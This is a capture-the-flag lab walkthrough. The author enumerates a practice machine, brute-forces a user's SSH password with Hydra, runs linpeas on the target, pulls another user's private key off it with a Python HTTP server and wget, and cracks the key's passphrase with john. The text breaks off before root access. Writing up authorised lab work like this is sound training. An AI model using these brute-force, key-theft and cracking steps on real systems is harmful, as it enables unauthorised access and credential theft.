Upon deploying the lab, I started enumeration on the IP provided to me:
nmap -sC -sV -sT -sU 10.10.6.124
We note that SSH, Samba/SMB, Apache webserver and apache jserv are running
Viewing the source code of the page, there is a comment to visit the “dev note” section. However, we don’t know where that is, as there aren’t any links to this page as referenced. So we have a few options to proceed. We can use GoBuster to try and brute force directories, or we can use Burp. I chose burp. So I fired it up, intercepted the initial request to the page, and sent it to content discovery:
Right-click >> Engagement tools >> Discover content >> config
To speed up the discovery and make it more focused, I removed the checkmarks from “Built in long file list” and “built in long directory list”. Instead, I loaded a dirbuster list:
Once done, I returned to the first tab and started the discovery. The results returned back rather quickly and behold…. We see the potentially referenced pages!
Both txt files appear to be notes between two colleagues “J” and “K”. The Dev.txt noted a few interesting points. The colleagues noted that apache struts is installed, and at version 2.5.12. It also notes that SMB has been configured (which we already knew via our enumeration). The second file, j.txt is a little more interesting. It notes that “J” is using a weak password…. “Password” maybe? Only time will tell.
Visiting the other web port, we’re presented with a default tomcat config page. Nothing too notable here
We don’t have a whole lot of info to go off of at this time, so lets do some further enumeration. Since we know that we have an apache webserver that has samba implemented, we can discern that this is likely a linux box. So lets run enum4linux
Looks like we have some valid usernames!
Not only do we have some valid usernames, but we should probably focus on Jan’s username since it was noted that she has a weak password earlier in our process. Lets try to brute force our way into ssh with Jans username. We are going to use Hydra-gtk and the “rockyou” wordlist. After configuring hydra and spraying the server, we came out with some valid credentials:
SSH’ing in works, and we now have a user with standard privs. Jan doesn’t appear to have sudo privs. Also, listing out apps and processes that have root permissions doesn’t return anything particularly interesting. Before browsing, I’m going to do a little more enumeration. So I spun up a python webserver in order to move linpeas over to the target machine. So I navigate to the local folder containing the script, then started up the server
python -m SimpleHTTPServer 8008
Then from the target machine, I fetched the file and executed it
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.sh
Linpeas didn’t find much, but it did disclose that we have access to Kays SSH private key!
So we will take the same route to get the key that we used earlier to retrieve linpeas. We will spin up a simple http server, wget the file over to our local machine, then give it proper permissions to utilize the key and log in as Kay.
Target: python -m SimpleHTTPServer 8008
Local: wget <TARGET_IP>:8008/id_rsa
chmod 600 id_rsa
ssh -i id_rsa kay@<TARGET_IP>
Annnnndddddddd….. FAIL! Looks like we still need the passphrase.
Well, lets try to crack the passphrase, shall we? So we are going to turn that key file into something John can consume and crack
ssh2john.py id_rsa > id_rsa.txt
Then we will run john against the resulting file
john — wordlist=*rockyou.txt id_rsa.txt
So let try to ssh in again with kays key
Winner, winner, chicken dinner!
Listing out my current directory exposes an interesting file
Lets try to list out what commands I can run as sudo
Uh-oh….. looks like the password we cracked isn’t her actual password.
What about the password from the pass.bak file?
Excellent! Now technically, you have all the information needed to complete the challenge questions. Theres just one thing missing….
This simply will not do….